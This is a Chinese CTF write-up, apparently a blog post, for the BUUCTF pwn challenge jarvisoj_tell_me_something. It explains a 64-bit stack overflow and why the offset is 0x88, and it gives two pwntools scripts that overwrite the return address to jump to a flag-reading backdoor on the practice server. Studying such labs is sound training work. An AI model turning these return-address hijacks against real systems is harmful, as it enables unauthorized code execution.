BUUCTF-jarvisoj_tell_me_something

本文介绍了一种栈溢出漏洞的利用方法,通过具体案例展示了如何使用checksec和IDA等工具进行分析,并通过编写EXP脚本来实现栈溢出攻击,最终获取目标系统的敏感信息。

1.checksec

2.IDA

read有栈溢出

 

flag.txt

进行栈溢出将返回地址覆盖为fopen函数地址 

3.EXP

from pwn import *

r=remote("node4.buuoj.cn",25237)
flag_addr=0x400620

payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)

r.interactive()

题目很简单,分析也不难

就是需要注意一点,偏移不需要加上rbp的8个字节

 

没有push rbp的操作,所以不用加8字节,需要注意这一点 

### 漏洞分析与利用方式 在 `jarvisoj_tell_me_something` 这道题目中,程序是一个 64 位的可执行文件,并且开启了 NX(No-eXecute)保护,这意味着栈上数据不能直接执行,攻击者无法直接注入 shellcode 到栈上执行。然而,程序中存在一个明显的栈溢出漏洞,这使得攻击者可以通过覆盖返回地址来控制程序执行流程[^1]。 程序的主要漏洞位于 `main` 函数中,变量 `v4` 是一个 64 位的局部变量,位于栈上。通过 `read` 函数向该变量读取了 0x100(256)字节的数据,而 `v4` 本身的大小仅为 8 字节。因此,这种不匹配会导致栈上的返回地址被覆盖,从而实现控制流劫持[^3]。 ### 利用方式 题目中存在一个后门函数 `good_game()`,该函数会尝试打开 `flag.txt` 文件,这意味着如果能够将程序的执行流跳转到该函数地址,就可以读取到 flag 文件内容[^1]。 在利用过程中,构造的 payload 由两部分组成: 1. **填充部分**:使用 `'A'` 或其他字符填充至 0x88 字节,以覆盖栈上的局部变量和保存的寄存器。 2. **地址覆盖部分**:将 `good_game()` 函数的地址以小端序格式写入栈上,覆盖返回地址。 最终的 payload 结构如下: ```python payload = b'A' * 0x88 + p64(good_game_addr) ``` ### EXP 示例 以下是一个典型的利用脚本示例,使用 `pwntools` 库进行远程连接和 payload 发送: ```python from pwn import * # 连接到远程服务器 r = remote("node4.buuoj.cn", 28428) # 获取 good_game 函数的地址 good_game_addr = 0x400620 # 构造 payload payload = b'A' * 0x88 + p64(good_game_addr) # 发送 payload r.sendline(payload) # 进入交互模式,查看 flag r.interactive() ``` ### 注意事项 1. **IDA 分析的准确性**:虽然 IDA 可以帮助快速定位溢出点和函数地址,但在某些情况下,IDA 的分析可能会与实际运行环境存在差异。例如,`main` 函数中没有 `push rbp` 操作,因此不需要额外填充 8 字节来覆盖保存的 `rbp` 值[^4]。 2. **远程连接问题**:不同题目实例的端口号可能不同,确保使用正确的 IP 和端口进行连接。 3. **环境一致性**:在本地测试时,可以使用 `process` 函数启动本地进程,但在提交时应切换为 `remote` 连接。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值